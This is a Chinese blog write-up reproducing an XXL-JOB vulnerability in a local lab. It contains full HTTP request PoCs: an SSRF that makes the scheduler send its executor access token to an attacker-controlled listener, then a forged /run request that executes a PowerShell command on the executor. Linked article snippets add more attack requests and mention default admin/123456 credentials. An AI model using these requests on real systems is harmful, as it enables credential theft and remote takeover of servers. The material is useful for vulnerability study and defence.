xxl-job ssrf漏洞复现

最新推荐文章于 2025-09-12 11:41:23 发布
原创 最新推荐文章于 2025-09-12 11:41:23 发布 · 2k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文详细描述了XXL-JOB平台中的一个安全漏洞,攻击者可通过SSRF利用不验证的addressList参数进行AccessToken获取和远程代码执行(RCE)。作者提供了漏洞复现步骤和构造PoC的方法,同时强调了安全配置的重要性。

xxl-job ssrf漏洞复现

漏洞简介

XXL-JOB是基于java语言的分布式任务调度平台,该漏洞来自/trigger,直接向addressList指定的地址发送请求,不判断addressList参数是否为有效的执行器地址。它可以利用SSRF漏洞,攻击者获取XXL-JOB-ACCESS-TOKEN并调用任意执行器

漏洞复现

项目地址:https://github.com/xuxueli/xxl-job

搭建环境,配置JDBC与TOKEN

image-20240126102117589

image-20240126102149282

根据官方文档,需要将调度中心和执行器,设置了相同的AccessToken

image-20240126102310287

所以将执行器token也设为123

image-20240126102405241

启动项目进入登陆界面http://127.0.0.1:8080/xxl-job-admin/,默认密码admin/123456

image-20240126102606521

新建一个低权限测试账户test/123456

image-20240126102633145

登录低权限账户发现无法访问任务管理功能页面

image-20240126102845403

image-20240126102825960

构造poc

POST /xxl-job-admin/jobinfo/trigger HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227d
Connection: close

id=1&executorParam=test&addressList=http%3A%2F%2F127.0.0.1%3A9090

开启一个nc监听端口9090,发送poc,查看泄露token

image-20240126103209960

RCE

构造payload

POST /run HTTP/1.1
Host: 127.0.0.1:9999
Content-Length: 69
XXL-JOB-ACCESS-TOKEN: 123
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



{
        "jobId":1,                                  
        "executorHandler":"demoJobHandler",         
        "executorParams":"demoJobHandler",          
        "executorBlockStrategy":"COVER_EARLY",      
        "executorTimeout":0,                        
        "logId":1,                                  
        "logDateTime":1586629003729,                
        "glueType":"GLUE_POWERSHELL",                          
        "glueSource":"calc",                         
        "glueUpdatetime":1586629003727,             
        "broadcastIndex":0,                         
        "broadcastTotal":0                          
}

发送,即可发现计算机弹出

image-20240126110257270

XXL-JOB 任务调度中心 后台任意命令执行漏洞
LiBai'S BLOG
10-17 3万+
在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量结算,计算当日的订单量,当日的成本收入等。当存在大量定时任务的时候,任务的管理也会成为一个比较头痛的问题。XXL-JOB 任务调度中心系统存在后台命令执行漏洞,攻击者可以通过反弹shell执行任意命令,获取服务器管理权限。
Apache ServiceComb Service-Center SSRF漏洞复现(CVE-2023-44313)
m0_50797689的博客
02-01 541
Apache ServiceComb Service-Center SSRF漏洞复现(CVE-2023-44313)
漏洞复现-XXL-JOB accessToken 存在身份认证绕过漏洞
玄道的网安博客
08-13 1911
官方已修复该漏洞,建议用户修改调度中心和执行器配置项 xxl.job.accessToken 的默认值。默认情况下是非空的,也就是xxl.job.accessToken=default_token。动态生效:用户在线通过Web IDE开发的任务代码,远程推送至执行器,实时加载执行。XXL-JOB为了灵活支持多语言以及脚本任务,提供了创新的 “是许雪里(XXL-JOB)社区的一款基于java语言的分布式任务调度平台。:任务以源码方式维护在调度中心,支持通过Web IDE在线开发、维护。
【Web安全】XXL-JOB框架SRC高频漏洞分析总结
最新发布
水滴石穿
09-12 2125
XXL-JOB是国内主流的开源分布式任务调度框架,由徐雪里开发维护,以轻量易用、高可用、适配分布式场景等特性,广泛应用于互联网、金融等行业,承担定时任务调度、批量数据处理等核心业务。其架构核心为“调度中心(负责任务配置与触发)”与“执行器(负责任务实际运行)”,二者协同实现分布式任务管理。随着其部署范围扩大,低版本因安全设计不足,暴露出API未授权访问、默认弱口令、反序列化注入等高频漏洞,成为安全响应中心(SRC)常见安全事件诱因,可能导致服务器被控、业务数据泄露等严重后果。
XXL-JOB 漏洞大全
yggcwhat
09-20 3877
XXL-JOB 漏洞大全
漏洞研究(8):XXL-JOB调度中心后台日志查看SSRF漏洞 CVE-2022-43183
OneMoreThink
05-17 1136
由于调度中心去执行器的IP地址获取调度日志时,携带了通信密钥accessToken,因此恶意用户可以将执行器的IP地址指定为他可控的HTTP服务器,从而窃取XXL-JOB的通信密钥。可以利用SSRF漏洞窃取accessToken,进而伪装成调度中心,与所有执行器进行调度通信,对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。第三步:利用accessToken,伪装成调度中心与执行器进行调度通信,对执行器所在的服务器执行任意命令,从而获得执行器所在服务器的权限。当普通权限的恶意用户。
XXL-JOB默认accessToken身份绕过--远程代码执行漏洞复现
Tender*的博客
11-14 5326
漏洞是由于XXL-JOB 在默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值,如果用户没有修改该默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,导致远程代码执行。链接:https://pan.baidu.com/s/12AkZ6JdpOm36bHrq1EEVPQ。XXL-JOB是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。也可以尝试去搭建环境复现。三.网络空间测绘查询。
当下的网络安全行业前景到底怎么样?还能否入行?
2201_75735270的博客
11-16 293
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
CVE-2014-4210Weblogic SSRF漏洞复现
2401_86120759的博客
10-20 726
影响版本: weblogic 10.0.2-10.3.6版本。第二步:SSRF漏洞存在以下地址,访问判断端口是否开放。第六步:VPS设置端口监听并发送数据包获取Shell。第三步:探测内网主机存活,如果IP不存在则会返回。第四步:使用脚本进行内网主机存活探测。服务尝试将反弹Shell脚本写入。第一步:进入漏洞环境并启动环境。而IP地址存在则返回如下信息。第五步:发现内网主机。
ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)
0xSec
03-14 2352
2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。
D-Tale SSRF漏洞复现CVE-2024-21642)
0xSec
01-22 807
D-Tale 是 Pandas 数据结构的可视化工具。3.9.0 之前的 D-Tale 版本的用户可能容易受到服务器端请求伪造 (SSRF) 的攻击,从而使攻击者能够访问服务器上的文件。
Weblogic-SSRF漏洞复现
小小猪的博客
11-22 2950
Weblogic-SSRF漏洞复现 漏洞分析: Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。 漏洞复现: 使用docker来模拟漏洞环境 docker github地址:地址 搭建的载体为Ubuntu 搭建过程不在详述,搭建完成后,访问http://your-ip:7001/uddiexplor.
XXL-JOB任务调度系统远程命令执行漏洞
KP_0x01的博客
07-13 2116
XXL-JOB命令执行漏洞证明:开源组件需要持续安全监控任务调度系统应作为重点防护对象输入验证是Web安全的第一道防线。
XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-03 1361
XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。经分析和研判,该漏洞利用难度低,可导致远程代码执行。
XXL-JOB漏洞分析与利用
m0_63828240的博客
08-19 3681
在当今的数字化时代,任务调度平台对于企业级应用来说至关重要。它们负责自动化和协调各种时间敏感或周期性的任务,确保业务流程的顺畅运行。XXL-JOB作为一款流行的分布式任务调度平台,因其强大的功能和易用性,被广泛部署在各种规模的系统中。然而,随着其应用的普及,安全研究人员开始关注这些系统可能存在的潜在风险,一个漏洞的发现可能会导致数据泄露、服务中断甚至整个系统被控制。对于渗透测试人员来说,学习XXL-JOB漏洞原理,能够在一定程度上提升渗透能力。
xxl-job反序列化漏洞分析复现
panda的博客
10-20 5506
xxl-job反序列化分析复现
XXL-JOB executor 未授权访问漏洞
黑白的博客
12-23 1447
声明 好好学习,天天向上 漏洞描述 XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。 影响范围 复现过程 这里使用2.2.0版本 使用vulhub /app/vulhub-master/xxl-job/unacc 使用docke
XXL-JOB executor 未授权访问漏洞复现
2301_76467680的博客
06-26 599
ip+端口 //8080管理端 9999客户端。向客户端发送如下数据包。//host为IP地址。
XXL-JOB任务调度中心后台命令执行漏洞
chaojixiaojingang
04-13 5853
1.漏洞描述 XXL-JOB任务调度中心后台存在命令执行漏洞,攻击者可在后台通过写入shell命令任务调度获取服务器控制权限。 2.资产查找 FOFA:app="XXL-JOB" || title="任务调度中心" 3.漏洞复现 1)以默认弱口令admin/123456进入后台 http://ip/toLogin 2)选择任务管理模块,新增任务 (PS:运行模式选择GLUE(Shell)) 3)点击 GLUE IDE编辑脚本,输入命令 4)操作选择执行一次 ...
xxl-job9999端口 渗透测试复现
06-14
### xxl-job 9999端口渗透测试复现方法 xxl-job 是一个分布式任务调度平台,其默认的 9999 端口通常用于 executor 的通信。在进行渗透测试时,需要重点关注以下几个方面:未授权访问、反序列化漏洞SSRF 漏洞等[^1]。 #### 1. 未授权访问漏洞 如果 xxl-job 的 executor 配置了开放的访问权限,攻击者可以通过直接访问 9999 端口来触发任务执行或获取敏感信息。可以通过以下步骤验证是否存在未授权访问漏洞- 使用 curl 或 Postman 工具向目标地址发送请求。 - 示例代码如下: ```bash curl http://target:9999/xxl-job-executor/run -d "jobId=1&executorHandler=testHandler&executorParams=&executorBlockStrategy=&executorTimeout=&logId=1&logDateTim=" ``` 如果返回结果中包含任务执行的日志,则说明存在未授权访问漏洞[^4]。 #### 2. Hessian2 反序列化漏洞 Hessian 是一种轻量级的二进制协议,常用于远程服务调用。xxl-job 在特定版本中使用了 Hessian2 协议,可能导致反序列化漏洞。利用该漏洞可以实现远程代码执行(RCE)。以下是漏洞利用的基本流程: - 构造恶意的 Hessian 请求包。 - 将恶意负载发送至目标系统的 9999 端口。 - 如果目标系统未正确校验输入数据,则会解析并执行恶意代码。 示例代码(仅用于学习目的): ```python import requests url = "http://target:9999/xxl-job-executor/run" data = { "jobId": "1", "executorHandler": "testHandler", "executorParams": "", "executorBlockStrategy": "", "executorTimeout": "", "logId": "1", "logDateTime": "" } response = requests.post(url, data=data) print(response.text) ``` #### 3. SSRF 漏洞 xxl-job 的调度中心可能存在 SSRF 漏洞,攻击者可通过构造恶意请求窃取内部服务的信息或进一步扩大攻击范围。例如,通过 `/joblog/logDetailCat` 接口发起 SSRF 请求[^3]。 示例代码(仅用于学习目的): ```bash POST /xxl-job-admin/joblog/logDetailCat HTTP/1.1 Host: target:8083 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: XXL_JOB_LOGIN_IDENTITY=your_token executorAddress=http%3A%2F%2Finternal-service%3A8080%2F&triggerTime=1675953600000&logId=1&fromLineNum=1 ``` #### 4. 弱口令登录后台 RCE 如果 xxl-job 的管理后台启用了弱口令(如默认用户名 `admin` 和密码 `123456`),攻击者可以通过登录后台并利用相关功能实现远程代码执行。建议在测试前尝试使用默认凭据登录,并检查是否可以上传恶意脚本或配置文件[^2]。 ### 注意事项 - 渗透测试必须在合法授权的情况下进行,未经授权的测试可能违反相关法律法规。 - 测试完成后应及时修复发现的安全问题,并通知相关责任人。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值